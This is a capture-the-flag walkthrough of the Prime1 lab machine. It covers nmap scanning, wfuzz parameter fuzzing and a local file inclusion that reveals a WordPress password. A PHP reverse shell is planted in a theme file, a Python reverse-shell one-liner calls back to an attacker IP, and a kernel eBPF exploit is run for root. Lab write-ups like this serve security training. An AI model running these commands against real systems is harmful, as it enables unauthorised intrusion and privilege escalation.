Prime1 Writeup

In this walkthrough, we will be exploiting this machine using WordPress. However, it is necessary to enumerate thoroughly to obtain the WordPress credentials. Moreover, for privilege escalation (PE), this machine is vulnerable to a kernel exploit. We may encounter rabbit holes in our journey, including brute-forcing the victor password. Once we gain access to the machine, we notice that the sudo executable is available but has not been used to gain a root shell.

Nmap

nmap -sCV -p- -vvv 10.0.2.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-22 03:02 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Initiating Ping Scan at 03:02
Scanning 10.0.2.104 [2 ports]
Completed Ping Scan at 03:02, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:02
Completed Parallel DNS resolution of 1 host. at 03:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 03:02
Scanning 10.0.2.104 [65535 ports]
Discovered open port 22/tcp on 10.0.2.104
Discovered open port 80/tcp on 10.0.2.104
Completed Connect Scan at 03:02, 31.15s elapsed (65535 total ports)
Initiating Service scan at 03:02
Scanning 2 services on 10.0.2.104
Completed Service scan at 03:02, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 10.0.2.104.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.16s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Nmap scan report for 10.0.2.104
Host is up, received syn-ack (0.054s latency).
Scanned at 2021-07-22 03:02:02 BST for 38s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcSVb7n0rTb58TfCcHJgtutnZzqf0hl48jPxI+VHOyhiQIihkQVkshhc8LdnSUg2BRGZL+RFfNLan9Q6FY0D7T/7PMlggPtSLU80er3JJO+XMfO3NURgMtVtKS0m+nRbL9C/pKSgBewxIcPk7Y45aXjAo7tsSoJ3DZUDcaitfFbAlr+108VBSx/arOXbYtusI1E2OCj1v/VKgVA9N/FL/OHuloOZPs/hY0MoamQKy+XYNdyCtrvSeRmItf09YXhFJwfY9Tr/nk077J7cz3r3INP+AFrpKVjdUAtxNpb+zAJLMJY8WF7oRZ1B8Sdljsslkh8PPK8e6Z4/rlCaJYW0OX
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiCXK7fYpBhJbT1KsyJkcpdXc1+zrB9rHVxBPtvA9hwTF4R4dZCZI9IpMFrperU0wqI/8uGYF9mW8l3aOAhJqc=
|   256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKMh3392Cf8RmKX5UyT6C1yLIVbncwwUg1i2P7/ucKk
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 03:02
Completed NSE at 03:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.96 seconds

Enumeration

Web Enumeration

using drib , we found secret.txt

so from above hint lets start fuzzing the parameter on php pages

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 --hc 404 http://10.0.2.104/index.php?FUZZ=something
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.0.2.104/index.php?FUZZ=something
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                
=====================================================================

000000341:   200        7 L      19 W       206 Ch      "file"  

so we find that file a paremeter , now lets fuzz for any lfi

thwn we can movw to image.php there we’ll fuzz for lfi

yes now we have the right lfi , and also it mentioned that there is a password file at /home/saket directory

now we have the passwd , lets try to use for wordpress

Exploitation

now its easy to get into machine via wordpress

lets inject the php code into a file which returns us a reverse shell

need to curl the phpfile to get a reverseshell

curl http://10.0.2.104/wordpress/wp-content/themes/twentynineteen/secret.php

nice we get a reverse shell

nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.0.2.93] from (UNKNOWN) [10.0.2.104] 43204
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 22:10:13 up  1:43,  1 user,  load average: 0.05, 0.17, 0.18
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
guest-gy tty7     :0               21:10    2:04m  2.74s  0.22s /sbin/upstart --user
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ export RHOST="10.0.2.93";export RPORT=5555;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

PrivilageEsclation

Kernal exploit


uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

this version is vulnerable to kernal exploit

Here is the link to the kernal exploit

www-data@ubuntu:/tmp$ gcc explit.c -o exploit
gcc explit.c -o exploit
www-data@ubuntu:/tmp$ ./exploit
./exploit
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff92c47b659200
[*] Leaking sock struct from ffff92c47745f800
[*] Sock->sk_rcvtimeo at offset 592
[*] Cred structure at ffff92c4789396c0
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff92c4789396c0
[*] credentials patched, launching shell...
# whoami
whoami
root